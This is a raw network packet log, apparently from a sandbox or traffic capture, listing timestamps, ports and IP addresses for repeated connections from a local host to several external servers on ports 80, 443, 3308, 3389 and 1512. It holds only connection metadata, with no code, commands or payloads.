Jan 12, 2021 01:43:54.469536066 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.469600916 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.469662905 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.469722986 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.469726086 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.469763994 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.469772100 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.469774961 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.469777107 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.469780922 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.469811916 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.469818115 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.469841003 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.469862938 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.469880104 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.469896078 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.469923973 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.469948053 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.469973087 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.470084906 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.483256102 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662118912 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662175894 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662236929 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662288904 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662344933 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662395000 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662444115 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662497044 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662503004 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662539959 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662545919 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662547112 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662550926 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662554979 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662597895 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662619114 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662647963 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662663937 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662698030 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662717104 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662749052 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662764072 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662800074 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662815094 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662849903 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662867069 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662900925 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662915945 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.662951946 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.662967920 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.663002014 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.663017988 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.663052082 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.663067102 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.663101912 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.663115978 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.663152933 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.663167000 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.663198948 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:54.663217068 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.663288116 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:54.665252924 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:58.118892908 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:43:58.171514988 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 01:43:58.171746016 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:43:58.197602987 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:43:58.249978065 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 01:43:58.265167952 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 01:43:58.265315056 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:43:58.279357910 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:43:58.334008932 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 01:43:58.339442015 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:00.449836016 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:00.450315952 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:00.502702951 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:00.502979994 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:00.555394888 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:00.674026966 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:00.674082994 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:00.674350977 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:00.680562019 CET	49166	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:00.732857943 CET	443	49166	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:00.910310984 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:00.953707933 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:00.953825951 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:00.956084967 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:00.999138117 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:01.015768051 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:01.015824080 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:01.015887976 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:01.015932083 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:01.022737980 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:01.068047047 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:01.068284035 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:01.079502106 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:01.079813957 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:01.123076916 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:01.123363018 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:01.162874937 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:01.166703939 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:01.166733980 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:01.280018091 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:01.280064106 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:01.280428886 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:01.286360025 CET	49168	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:01.329699993 CET	3308	49168	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:01.473429918 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.527882099 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:01.528079987 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.529632092 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.583828926 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:01.606813908 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:01.606874943 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:01.606930971 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.606956959 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.621332884 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.681444883 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:01.681754112 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.692972898 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.693080902 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.747178078 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:01.747387886 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.786664963 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:01.801760912 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:01.801801920 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:01.893734932 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:01.893801928 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:01.893825054 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.893856049 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.896825075 CET	49169	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:01.951023102 CET	3389	49169	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:02.064814091 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.117921114 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.118058920 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.119560957 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.172405005 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.179419994 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.179478884 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.179594040 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.179642916 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.195501089 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.249608040 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.249941111 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.267003059 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.267205954 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.320157051 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.320384026 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.358195066 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.373353958 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.373460054 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.471487999 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.471534967 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.471849918 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.477257967 CET	49170	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:02.530191898 CET	1512	49170	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:02.602648020 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:02.654952049 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:02.655153990 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:02.658108950 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:02.710247993 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:02.725135088 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:02.725343943 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:02.740144968 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:02.794641018 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:02.795011044 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:02.807806969 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:02.808041096 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:02.860100985 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:02.860426903 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:02.912765026 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:03.031061888 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:03.031112909 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:03.031198025 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:03.031250954 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:03.036725998 CET	49171	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:03.089000940 CET	443	49171	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:03.149435997 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.192682028 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:03.192944050 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.194618940 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.237683058 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:03.248610973 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:03.248691082 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:03.248800993 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.248851061 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.264755011 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.309920073 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:03.310269117 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.322304964 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.322362900 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.365547895 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:03.365880013 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.409254074 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:03.521820068 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:03.521867037 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:03.522205114 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.527719021 CET	49172	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:03.570941925 CET	3308	49172	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:03.649717093 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:03.704051971 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:03.704229116 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:03.705707073 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:03.759605885 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:03.773777008 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:03.773818016 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:03.773926973 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:03.778937101 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:03.838911057 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:03.839169025 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:03.851016045 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:03.851217031 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:03.909244061 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:03.909547091 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:03.948498964 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:03.964148998 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:03.964195013 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:04.053816080 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:04.053864956 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:04.054145098 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:04.059654951 CET	49173	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:04.113909006 CET	3389	49173	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:04.175651073 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.228637934 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:04.228766918 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.229912996 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.282680035 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:04.289817095 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:04.289865017 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:04.289910078 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.289937019 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.296549082 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.350359917 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:04.350438118 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.360624075 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.361108065 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.414005041 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:04.414210081 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.450089931 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:04.467003107 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:04.571268082 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:04.571306944 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:04.571553946 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.577193022 CET	49174	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:04.630091906 CET	1512	49174	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:04.692377090 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:04.744822979 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:04.745086908 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:04.746756077 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:04.799022913 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:04.816543102 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:04.816715002 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:04.830691099 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:04.885477066 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:04.885819912 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:04.898479939 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:04.898938894 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:04.951225042 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:04.951463938 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:05.003904104 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:05.123437881 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:05.123667002 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:05.123713970 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:05.123867989 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:05.129259109 CET	49175	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:05.181508064 CET	443	49175	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:05.239034891 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:05.282398939 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.282675982 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:05.284601927 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:05.327732086 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.342644930 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.342694044 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.342963934 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:05.362132072 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:05.407670021 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.407927990 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:05.419325113 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:05.419509888 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:05.462652922 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.462951899 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:05.503467083 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.506278038 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.506318092 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.618129969 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.618175030 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.618473053 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:05.624054909 CET	49176	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:05.667376995 CET	3308	49176	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:05.738277912 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:05.792201042 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:05.792372942 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:05.793798923 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:05.847579956 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:05.861566067 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:05.861619949 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:05.861717939 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:05.861772060 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:05.873887062 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:05.933093071 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:05.933270931 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:05.938611984 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:05.938703060 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:05.992465973 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:05.992635012 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:06.032229900 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:06.046435118 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:06.046474934 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:06.136786938 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:06.136851072 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:06.136935949 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:06.136986971 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:06.142573118 CET	49177	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:06.196337938 CET	3389	49177	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:06.256124020 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:06.309129000 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.309231997 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:06.310591936 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:06.363343000 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.370240927 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.370273113 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.370346069 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:06.370369911 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:06.387774944 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:06.441962004 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.442222118 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:06.453836918 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:06.453985929 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:06.506855965 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.506995916 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:06.546287060 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.560003042 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.560054064 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.663116932 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.663137913 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.663228035 CET	49178	1512	192.168.2.22	46.105.131.65
